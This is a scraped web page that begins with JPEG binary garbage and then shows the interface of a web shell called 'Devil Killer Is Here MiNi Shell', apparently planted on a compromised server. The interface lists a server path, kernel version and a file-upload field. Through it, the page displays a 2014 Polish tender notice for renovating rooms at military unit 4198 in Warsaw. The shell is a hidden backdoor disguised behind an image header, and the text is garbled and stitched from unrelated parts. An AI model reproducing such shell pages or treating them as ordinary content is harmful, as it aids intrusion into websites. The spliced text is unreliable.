JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140630/139885-N-2014.html

<p class="kh_header"><b>Warszawa: Wykonania remontu pomieszczeń - roboty ogólnobudowlane KW 0030 budynek 2 i 4 ul. Leśna w Warszawie</b><br>
<b>Numer ogłoszenia: 139885 - 2014; data zamieszczenia: 30.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1bltr.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonania remontu pomieszczeń - roboty ogólnobudowlane KW 0030 budynek 2 i 4 ul. Leśna w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.OPIS  PRZEDMIOTU  ZAMÓWIENIA
Opis przedmiotu zamówienia dotyczy specyfikacji technicznej wykonania i odbioru robót  
Zadania Remont pomieszczeń  realizowanego w  2 etapach :
1.Zadanie nr 1 - Remont pomieszczeń w budynku nr 2 w kompleksie wojskowym przy ul. Leśnej  w Warszawie (wybrane pomieszczenia).
2. Zadanie nr 2 - Remont pomieszczeń w budynku nr 4 w kompleksie wojskowym przy ul. Leśnej 5 w Warszawie.
 II.OBOWIĄZKI INWESTORA
Inwestor przekazuje Wykonawcy dokumenty do wykonania przedmiotu zamówienia 
w postaci Przedmiarów do Kosztorysów Inwestorskich wraz z Opisem Przedmiotu Zamówienia. 
Inwestor przekazuje plac budowy po zgłoszeniu Wykonawcy do wykonania zadania - wykonując protokół przekazania placu budowy, określający teren budowy, sposób i miejsce składowania materiałów. Inwestor wskazuje miejsce poboru mediów.
III.OBOWIĄZKI WYKONAWCY
Wykonawca zobowiązany jest do dokonania wizji lokalnej obiektu-(na własny koszt- oraz zdobycia wszelkich informacji, które mogą być konieczne do prawidłowej wyceny wartości robót, gdyż wyklucza się możliwość roszczeń wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do prawidłowego wykonania umowy. Wykonawca 
w trakcie realizacji zamówienia -prace będą wykonywane w budynku czynnym- umożliwi dojście i dojazd do obiektu objętego zadaniem. Wykonawca jest zobowiązany do wykonania prac zgodnie z obowiązującymi przepisami w zakresie BHP, p.poż. i prawa budowlanego. Wykonawca przejmuje plac budowy, zabezpiecza i oznakowuje zgodnie z prawem budowlanym teren budowy wraz z miejscem transportu materiałów oraz we własnym zakresie zorganizuje, urządzi zaplecze budowy -np. pomieszczenia socjalne i sanitarne-. Wykonawca instaluje tymczasowe urządzenia zabezpieczające oraz przedstawia harmonogram i terminarz wykonania robót - Inwestorowi celem akceptacji. Wykonawca ponosi pełną odpowiedzialność za utrzymanie placu budowy oraz zaplecza technicznego do momentu odbioru końcowego robót i protokolarnego przekazania. Wykonawca zobowiązany będzie do ustawicznego utrzymania placu budowy i zaplecza w stanie gwarantującym bezpieczeństwo osób korzystających z tych terenów. Wykonawca poniesie koszty związane z zabezpieczeniem kontenerów na materiały demontażowe w celu uniknięcia składowania stert i nasypów gruzu i innych materiałów na placu budowy i w okolicy. W miarę postępu robót plac budowy i zaplecze techniczne powinno być porządkowane, usuwane materiały z demontażu, zbędne materiały, sprzęt i zanieczyszczenia. Wykonawca po zakończeniu robót przywróci teren zaplecza do stanu nie gorszego niż pierwotny. Nowo położone wykładziny z tworzyw sztucznych będą zmyte -środek do czyszczenia zasadniczego R280 do zmywania wykładzin z tworzywa sztucznego- i zapastowane właściwym preparatem oraz okna będą umyte po robotach malarskich. Wykonawca powinien stosować się do Ustawy o Ochronie Środowiska 
i zabezpieczyć glebę zaplecza technicznego przed zniszczeniem drzewostanu, szkodliwymi substancjami tj. paliwo, olej, chemikalia oraz powietrze przed gazami, pyłami. Wykonawca poniesie koszty związane z wypłatą odszkodowań za wszelkie zniszczenia, które powstały 
w trakcie prowadzenia robót, chyba że wynikają one z przyczyn, za które Wykonawca nie ponosi odpowiedzialności.
IV.ZAKRES ROBÓT
Robotami ogólnobudowlanymi w budynku nr 2 są objęte wybrane pomieszczenia -7, 10, 12, 12a, 12b, 14, 15, 16, 24, 25- oraz korytarz główny i łazienka damska, natomiast w budynku nr 4 roboty obejmują wszystkie pomieszczenia wraz z łazienką męską i ciągami komunikacyjnymi. Niniejsze prace przewidują niwelację różnicy poziomów posadzek, wymianę istniejących wykładzin podłogowych, likwidację okładzin ściennych, położenie gładzi gipsowych i malowanie tynków wewnętrznych. Zakres robót przewiduje też wymianę stolarki drzwiowej wewnętrznej, likwidację luksferów, burzenie wskazanych ścianek działowych i utworzenie nowych z płyt k-g oraz wykonanie sufitów podwieszanych w wybranych pomieszczeniach. W łazienkach budynków nr 2 i 4 przewidziana jest wymiana wyposażenia elementów z ceramiki sanitarnej i armatury, kabin natryskowych wraz z podejściami oraz montażem nowych rurociągów ciepłej i zimnej wody, wymiana okładzin ściennych i podłogowych, montaż ścianek systemowych oraz zmiana aranżacji elementów składowych stanowiących łazienkę. Na roboty konserwacyjne elektryczne składają się położenie instalacji zasilania oświetlenia i gniazd  w miejsce istniejącej aluminiowej instalacji elektrycznej wraz z osprzętem -oprawy oświetleniowe, gniazda, puszki-, rozbudowa i wymiana tablic rozdzielczych, konieczne prace demontażowe oraz wykonanie niezbędnych pomiarów elektrycznych. Roboty sanitarne w budynku nr 2 przewidują wymianę grzejników wraz z zaworami w części pomieszczeń, natomiast w budynku nr 4 robotami objęta jest kompleksowa wymiana grzejników wraz z zaworami, wymiana rurociągów stalowych instalacji centralnego ogrzewania na wykonane z tworzyw sztucznych PP-R zespolonych fusiotherm-Stabi.          
Precyzyjniej scharakteryzowane roboty na każdym budynku wyszczególnione są poniżej. 
Asortyment robót z branży ogólnobudowlanej, elektrycznej i sanitarnej będzie obejmował w szczególności 
1.Prace wspólne dla obu etapów -Remont pomieszczeń w budynkach nr 2 i 4-
Łazienki : damska i męska  - zmiana aranżacji pomieszczeń :
-rozebranie ścianek działowych z cegieł na zaprawie cementowo-wapiennej o grubości 1-2 ceg. i przymurowanie nowych ścianek z cegieł o grubości 1-2 ceg. na zaprawie cementowo-wapiennej do ościeży lub powierzchni ścian w nowych aranżacjach,
-demontaż istniejących grzejników i montaż nowych stalowych łazienkowych wraz z zaworami termostatycznymi,
-demontaż baterii i urządzeń sanitarnych wraz z podejściami, montaż nowych w nowej aranżacji i ilości,
-wykonanie niezbędnych rurociągów w technologii z tworzyw sztucznych wraz z innymi pracami towarzyszącymi w rodzaju i ilościach podanych w przedmiarze prac. 
-sprawdzenie szczelności instalacji wodociągowej,
-demontaż opraw oświetleniowych i gniazd energetycznych i montaż w nowej aranżacji wraz z wykonaniem niezbędnych instalacji elektrycznych. 
-demontaż okładzin ściennych i okładzin posadzek z płytek ceramicznych na zaprawie i kleju
-przygotowanie, zagruntowanie podłoża pod montaż płytek ceramicznych ściennych i podłogowych,   
-montaż okładzin z płytek ceramicznych 30 x 60 na ścianach i 30 x 30 posadzek , na klej
-wykonanie zabudowy rurek z płyt gipsowo-włóknowa  wodo- i ognioodporne,
-montaż kabin systemowych WC wykonanych z płyt HPL w kolorze standardowym, krawędzie ścian osłonięte profilem aluminiowym, okucia z aluminium,
-demontaż i montaż nowych drzwi drewnianych 0,90 x 2,00,
-montaż klap rewizyjnych aluminiowych 300x300 mm i wymiana kratek wentylacyjnych,
-odgrzybianie miejsc zawilgoconych  i zeskrobanie i zmycie starych farb z sufitów i ścian,
-wykonanie gładzi gipsowych gr. 3 mm jednowarstwowych na ścianach i stropach na podłożu z tynku.
-dwukrotne malowanie farbami emulsyjnymi podłoży gipsowych z gruntowaniem -ściany i sufity
-mycie okien po robotach malarskich okien.
-transport materiałów z demontażu.
Pozostałe pomieszczenia:
-uzupełnienie ścian lub zamurowanie otworów w ścianach,
-wykonanie sufitów podwieszanych dwuwarstwowych na ruszcie metalowym w wybranych pomieszczeniach,
-wykonanie zabudowy rurociągów z płyt gipsowo kartonowych,
-uzupełnienie tynków wewnętrznych zwykłych kat. III ścian i sufitów,
-odgrzybianie miejsc zawilgoconych.
-zeskrobanie, zmycie starych farb i gruntowanie sufitów i ścian,
-wykonanie gładzi gipsowej na sufitach i ścianach.
-dwukrotne malowanie farbami emulsyjnymi podłoży gipsowych z gruntowaniem -ściany i sufity-. 
-demontaż posadzki z tworzyw sztucznych i tekstylnych, 
-wykonanie warstw wyrównawczych pod posadzki i niwelacji różnicy poziomów z zaprawy samopoziomującej o różnych grubościach wykonywane przy użyciu -Miksokreta-, 
-klejenie i zgrzewanie wykładzin rulonowych PCW wielowarstwowych na przygotowanym podłożu wraz z wywinięciem na ścianie,
-montaż wykładzin podłogowych dywanowych wraz z montażem listew przyściennych.
-demontaż istniejących grzejników i montaż nowych stalowych panelowych wraz z zaworami termostatycznymi i pracami towarzyszącymi,
-wymiana opraw oświetleniowych i gniazd energetycznych na  nowe.
-montaż opraw oświetleniowych w sufitach podwieszanych - oprawy rastrowe 4x18,
-mycie okien po robotach malarskich, 
-transport materiałów z demontażu.
2.Prace indywidualne dla 1 etapu  -Remont pomieszczeń w budynku nr 2-:
-demontaż podokienników betonowych z lastriko i  montaż nowych z konglomeratu,
-malowanie farbami olejnymi starych tynków wewnętrznych,
-demontaż istniejącej i składanie nowej podłogi podniesionej technicznej REI30 z  dodatkową podkonstrukcją wzmacniającą 100% pow., i otworami rewizyjnymi 60x60, kratką wentylacyjną i puszkąpod instalację elektryczną- pomieszczenie nr 24.
-demontaż skrzynek rozdzielczych - 4 szt. i osprzętu modułowego,
-montaż 2 tablic rozdzielczych i rozbudowa istniejącej tablicy w korytarzu oraz dołożenie osprzętu w istniejących 3 skrzynkach rozdzielczych w serwerowni i korytarzu,
-dociągnięcie okablowania zasilania gwarantowanego do pom. 10 i 9,
-montaż koryt kablowych układanych na wspornikach naściennych w korytarzu.
-wykonanie właściwych pomiarów elektrycznych.
3.Prace indywidualne dla 2etapu  -Remont pomieszczeń w budynku nr 4- :
-wykonanie przesklepień w ścianach z cegieł,
-przygotowanie otworów w ścianach z k-g pod montaż drzwi, 
-demontaż skrzydeł drzwiowych i ościeżnic drewnianych,
-montaż ościeżnic stalowych wewnątrzlokalowych i montaż skrzydeł drzwiowych, płytowych, wewnętrznych, jednodzielnych wraz z naprawą tynków na styku ościeżnic ze ścianami,
-wymiana drzwi dwuskrzydłowych drewnianych na aluminiowe zg. z wymog. bhp,
-ikwidacja ścianek z kafli szklanych, zamurowanie otworu uzupełnienie tynków wewn. i gładzi gipsowej, na zewnątrz uzupełnienie ocieplenia i wykonanie wyprawy elewacyjnej cienkowarstwowej, malowanie tynków wewn. i zewn,
-demontaż boazerii z płyt,
-rozebranie ścianek działowych z płyt k-g i z cegieł,
-wydzielenie 3 pomieszczeń z użyciem płyt k-g,
-wykonanie ściany działowej zamykającej pomieszczenia 33 i 34,
-wymiana kratek wentylacyjnych,
-wykonanie wyprawy elewacyjnej cienkowarstwowej - lamperia w korytarzu i szatni,
-przełożenie elektronicznego zamka szyfrowego do nowych drzwi,
-wymiana konstrukcji wsporczej pod ekran precyzyjny,
-demontaż tablicy bezpiecznikowej i budowa nowej wraz z osprzętem modułowym w korytarzu,
-rozbudowa istniejącej tablicy TK zasilania komputerów,
-montaż koryt kablowych układanych na wspornikach naściennych i listew elektroinstalacyjnych w pom.13 ,
-położenie instalacji zasilania oświetlenia i gniazd -w miejsce aluminiowej- wraz z innymi pracami towarzyszącymi w rodzaju i ilościach podanych w przedmiarze prac,
-wykonanie właściwych pomiarów elektrycznych,
-wykonanie przebić w ścianach w celu demontażu i montażu rurociągów,
-demontaż rurociągów stalowych i osprzętu w instalacji c.o., montaż rurociągów z tworzyw sztucznych PP-R zespolonych fusiotherm-Stabi o połączeniach zgrzewanych wraz z innymi pracami towarzyszącymi w rodzaju i ilościach podanych w przedmiarze prac,
-montaż zaworów przelotowych pod automatyczne zawory odpowietrzające i automatycznych zaworów odpowietrzających na instalacji c.o., 
-zabetonowanie otworów w ścianach po montażu rurociągów,
-sprawdzenie szczelności instalacji c.o.
 Zakres w-w prac został określony w przedmiarze robót do wyceny dla Wykonawcy do przetargu. 
V .  WYMAGANIA  DOTYCZĄCE STOLARKI DRZEWNEJ:
Drzwi przeznaczone będą do zastosowania w obiekcie budownictwa użyteczności publicznej w budynkach nr 2 i 4:
 -   w budynku nr 4 - drzwi dwuskrzydłowe z kształtowników aluminiowych wewnętrzne przymykane, pełne, -szerokość skrzydła głównego 0,90m, zg. z wymog. bhp -   o wym. 1,40 x 2,08  -  szt. 1  
-   w budynku nr 4  -  skrzydła drzwiowe płytowe wewnętrzne jednodzielne pełne- dąb, ościeżnice stalowe dla drzwi wewnątrzlokalowych i wejściowych do lokalu malowane dwukrotnie   -   o wym. 0,90 x 2,05  -  szt. 13,
  -   w budynku nr 4  - skrzydła drzwiowe płytowe wewnętrzne łazienkowe szklone szybą o powierzchni do 0.2 m2, ościeżnica drewniana zwykła  -   o wym. 0,09 x 2,00  -  szt. 1,
 -    w budynku nr 2  -skrzydła drzwiowe płytowe wewnętrzne łazienkowe szklone szybą o powierzchni do 0.2 m2, ościeżnica drewniana zwykła  -   o wym. 0,09 x 2,00  -  szt. 1,
Kolorystyka do uzgodnienia z Użytkownikiem
   Drzwi muszą posiadać następujące badania i świadectwa:
-   Instytutu Techniki Budowlanej na zgodność z normą PN-90-B-92210,
-   Znak Budowlany,
VI.   WYMAGANIA DOTYCZĄCE WYPOSAŻENIA POMIESZCZEŃ :
-  kabina natryskowa - typowa w rodzaju kwadratowa, z brodzikiem natryskowym akrylowym wzmocnionym pianką poliuretanową kwadratowy, ze sztywną konstrukcja kabiny w kształtowników z aluminium, z wypełnieniem szybami z płyt polistyrenowych, matowymi,
-  ceramika sanitarna - umywalka, miski klozetowe typowe produkcji np. -Cersanit-, Koło  lub inne proponowane przez Wykonawcę lecz nie gorszej jakości,
-  okładzina ścienna pomieszczenia sanitariatów - to płytki tradycyjnie otrzymywane z glin, krzemionki, topników, barwników i innych surowców mineralnych, powinny być twarde, wytrzymałe i higieniczne, łatwe do czyszczenia, odporne na działanie preparatów  na bazie kwasów i zasad, ognioodporne i niepalne, o strukturze wierzchniej matowej, o bardzo małej nasiąkliwości o gr. ok. 0,7 mm, w kolorze do uzgodnienia z Użytkownikiem.
- okładzina podłogowa pomieszczenia sanitariatów - to płytki tradycyjnie otrzymywane z glin, krzemionki, topników, barwników i innych surowców mineralnych, powinny charakteryzować się wysoką twardością, wytrzymałe i higieniczne, łatwe do czyszczenia, odporne na działanie preparatów na bazie kwasów i zasad, ognioodporne i niepalne. Płytki powinny posiadać powierzchnię strukturalną wierzchnią matową, nie polerowaną, o bardzo małej nasiąkliwości, antypoślizgową z grupy R9 - R13 co określa norma ZH1-571-DIN51130, o dużej odporności na ścieranie - min. klasy IV. Grubość ok. 18 mm, w kolorze zgodnym z kolorystyką okładzin ściennych do uzgodnienia z Użytkownikiem.
 - wykładzina podłogowa z PVC  powinna być obiektowa -heterogeniczna-antypoślizgowa grub. min 2,0 mm położona  z wywinięciem wykładziny na ścianę na  wys. 0,10 m.
-   Posadzki z wykładzin dywanowych - rulonowe rekomendowane do pomieszczeń biurowych - wzorzyste łatwe do utrzymania w czystości.
-  grzejniki - powinny posiadać bardzo wysoką odporność na korozję wodną, powinny cechować się dużą trwałością eksploatacyjną, z przeznaczeniem dla pomieszczeń użyteczności publicznej, z przeznaczeniem dla obiegu czynnika grzejnego opalanego gazem o temp. 95 C i pełnej szczelności przy ciśnieniu roboczym 6 Bar, o wysokiej wydajności cieplnej z jednostki masy grzejnika, o lamelach oddających ciepło wykonanych z aluminium, z zamontowanym zasilaniem dolnym 1-2 cala, w rozstawie przyłączy 50 mm, posiadający estetyczny wygląd, wysoką jakość wykonania i trwałą powłokę z farby epoksydowo - poliestrowej nakładaną metodą elektrostatyczną i wypalaną w temp. 190 C, w kolorze białym wg palety RAL 9016. Grzejniki łazienkowe -stalowe, typu łazienkowego, drabinkowe. Grzejniki powinny być produkcji firmy posiadającej certyfikat ISO 9002 Rettig Heating Spółka z o.o. - np. grzejnik PURMO typ C 22, lub inny nie gorszej jakości spełniający wymagania polskiej normy PN-EN 442 i posiadać dopuszczenie do stosowania w budownictwie.
- zawory grzejnikowe, termostatyczne np. DANFOSS, lub inne lecz nie gorszej jakości.  
- płyty karton - gips do robót wykończeniowych w łazience - wodoodporne tz. zielone.
-instalacja kanalizacyjna powinna być wykonana z rur kanalizacyjnych kielichowychi  przelotowych z PCV, wyposażona w odpowietrzniki. 
 - instalacja wody ciepłej - wykonane w technologii rur, złączek i kształtek 
polipropylenu PP-R zespolone fusiotherm-Stabi PN 20, stabilizowane mechaniczne wkładką aluminiową perforowaną, przeznaczona do łączenia w sposób zgrzewany.
-   instalacja wody zimnej - wykonane technologii rur, złączek i kształtek z polipropylenu PP-R, przeznaczona do łączenia w sposób zgrzewany,
   -  gniazda instalacyjne wtyczkowe ze stykiem ochronnym 2 biegunowe z kluczem do zasilania komputerów podwójne -bud. nr 4 pom.: 13,13a, 13b, 13c, bud. nr 2 pom. 9,10-,
- w sufitach podwieszanych powinny być oprawy rastrowe 4x18W, częściowo z modułem awaryjnym w ilościach zgodnie z obmiarem,
- podokienniki wewn. mają być wykonane z płyt z konglomeratów kamiennych 
         na spoiwie poliestrowym. 
-podłoga podniesiona techniczna REI30- demontowalna z płyt anhydrytowych o wym 60x60 cm klejona pióro wpust, płyty muszą być obłożone posadzką  PCV elektrostatyczną gładką. Doliczono dodatkową podkonstrukcję wzmacniającą 100% pow., 4 otwory rewizyjne 60x60, kratę wentylacyjną i puszkę pod instalację elektryczną.
-  materiał do robót malarskich wewnętrznych - farba emulsyjna nie gorszej jakości jak powszechnie stosowane materiały do robót malarskich, nie gorszej jakości jak Śnieżka, Dekoral, itp. Zastosowanie kolorystyki - po okazaniu palety barw w uzgodnieniu z Użytkownikiem.
-  lamperia w korytarzu i szatni wykonana z wyprawy elewacyjnej cienkowarstwowej o fakturze rustykalnej CERESIT CT 68 grubości 2.5 mm z gotowej suchej mieszanki żywiczno-mineralnej. 
VII.WYMAGANIA DOTYCZĄCE POZOSTAŁYCH MATERIAŁÓW
Pozostałe materiały powinny posiadać dopuszczenie do obrotu i powszechnego stosowania w budownictwie opatrzone -znakiem budowlanym- na podstawie przepisów ogólnych Rozdział 4 - Znakowanie wyrobów (paragraf 9-l l) oraz powinny być zgodne z obowiązującymi normami, powinny posiadać odpowiednie atesty i świadectwa dopuszczenia do użycia oraz akceptację Inspektora Nadzoru.
Użyte materiały powinny posiadać dopuszczenie do obrotu i powszechnego stosowania w budownictwie opatrzone -znakiem budowlanym- na podstawie przepisów ogólnych Rozdział 4 - Znakowanie wyrobów -paragraf 9-l l-
VIII. WYMAGANIA DOTYCZĄCE SPRZĘTU
Elektronarzędzia powszechnego użytku w robotach budowlanych typu wiertarka z wiertłami, wkrętaka z oprzyrządowaniem, mieszarki wypraw tynkarskich, klejów i farb oraz narzędzia osobiste jak: wiaderka, młotki, szpachle, szpachelki oraz pace.
Ważnym sprzętem niezbędnym do wykonania robót powinny być drabiny, które powinny cechować się stosownymi certyfikatami dopuszczającymi do stosowania w budownictwie. Dobór sprzętu używany do wykonania robót przewidzianych w umowie powinien gwarantować dobrą jakość oraz powinien spełniać wszystkie warunki przestrzegania przepisów bhp.  
IX. SPOSÓB REALIZACJI ZAMÓWIENIA
1.Wykonawca ustala Kierownika Budowy posiadającego przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie do bezpośredniego kontaktu z Zamawiającym.
2.   Wykonawca zrealizuje roboty z własnych materiałów.	
3.  Ze względu na charakter budynku oraz kompleksu w którym się obiekty znajdują  materiały użyte do wykonania zadania mają być pierwszej jakości a jakość robót najwyższa. 
4.   Termin realizacji - 2 miesiące od daty podpisania umowy.
5.   Rozliczenie robót po całkowitym ich wykonaniu w sposób ryczałtowo-ilościowy.
 6. Wszystkie materiały powinny posiadać dopuszczenie do obrotu i powszechnego       stosowania w budownictwie na podstawie przepisów ogólnych - Rozdział IV -Znakowanie wyrobów -paragraf 9-11- i opatrzone znakiem budowlanym.
7.  Odpowiedzialność za jakość wykonywania wszystkich rodzajów robót wchodzących w    skład zadania w całości ponosi Wykonawca.
8. Materiały z demontażu tj. ościeżnice drzwiowe, drzwi, podokienniki betonowe z lastriko, wykładziny podłogowe, baterie umywalkowe i natryskowe, brodziki, grzejniki żeliwne, rurociągi stalowe podlegają przekazaniu na stan magazynu budowlanego Infrastuktury przy ul. Żwirki i Wigury 1 C, budynek Nr 66 po uprzednim wykonaniu dokumentu Asygnaty Przychodowej w Dziale Księgowości Materiałowej JW4198 przy ul. Żwirki i Wigury 1 C, Budynek Nr 2, pok. Nr 4. 
9.   Przekazaniu na stan magazynu budowlanego JW4198 nie podlegają:
-   gruz
-   płytki ceramiczne okładzin ściennych z demontażu
-   umywalki
-  ustępy z miską porcelanową
X. WARUNKI ODBIORU ROBÓT
l. Wykonawca zobowiązany jest do zgłoszenia Zamawiającemu o gotowości do  końcowego odbioru prac najpóźniej w dniu zakończenia robót wg umowy.
2.   Zamawiający zobowiązany jest dokonać odbioru prac najpóźniej w ciągu 7 dni od daty zgłoszenia. 
3.  Najpóźniej w dniu odbioru robót Wykonawca zobowiązany jest dostarczyć atesty i aprobaty i zgodności na wszystkie użyte do wykonania zadania materiały, oraz zrealizowane dokumenty przychodowe -asygnaty- na materiały demontażowe.
4. Zamawiający zastrzega konieczność kontroli prawidłowości wykonywania prac
w trakcie ich trwania potwierdzając Protokołem Odbioru Częściowego.
5. Potwierdzeniem końcowego odbioru będzie Protokół Końcowego Odbioru Robót sporządzony przez przedstawicieli obu stron i zatwierdzony przez Zamawiającego.
XI.KONTROLA JAKOŚCI ROBÓT
Kontrola transportu, składowania, wykonania i obsadzenia drzwi kontrola prawidłowości ruchu i szczelności skrzydeł drzwiowych, kontrola uszczelek.
Kontrola jakości użytych materiałów wyposażenia sanitariatów oraz szczelność połączeń prac sanitarnych.
Kontrola prawidłowości wykonania prac glazurniczych - wygląd płaszczyzn, pionowość i poziomość płaszczyzn, krawędzie przecięcia się płaszczyzn, trwałość montażu narożników oraz styki z ościeżnicami. 
Kontrola powierzchni posadzek na całej swojej powierzchni - trwale połączona z podkładem.  równość i poziom -lub ze spodkiem o ile jest przewidziany-. Dopuszczalne odchylenie powierzchni posadzki od płaszczyzny poziomej mierzone 2-metrową łatą w dowolnych kierunkach i w dowolnym miejscu nie powinno być większe niż 5 mm na długości łaty.
Spoiny między płytkami przez całą długość i szerokość pomieszczenia powinny tworzyć linie proste, dopuszczalne odchylenie spoin od linii prostej nie powinno wynosić więcej niż 2 mm na metr i 3 mm na całej długości i szerokości pomieszczenia, grubość spoin.
Dokumenty potwierdzające antypoślizgowość płytek ceramicznych.
Na etapie wykonawstwa na mocy kontroli robót zanikowych - kontrola grubości i jakości wykonania posadzki, jej zbrojenia i wykonania w poziomie.
Kontrola jakości robót - malowanie farbą emulsyjną ścian wg PN- 69-B-10280 - o robotach malarskich budowlanych farbami wodnymi i rozcieńczalnymi farbami emulsyjnymi - warunki wykonywania i odbioru robót.
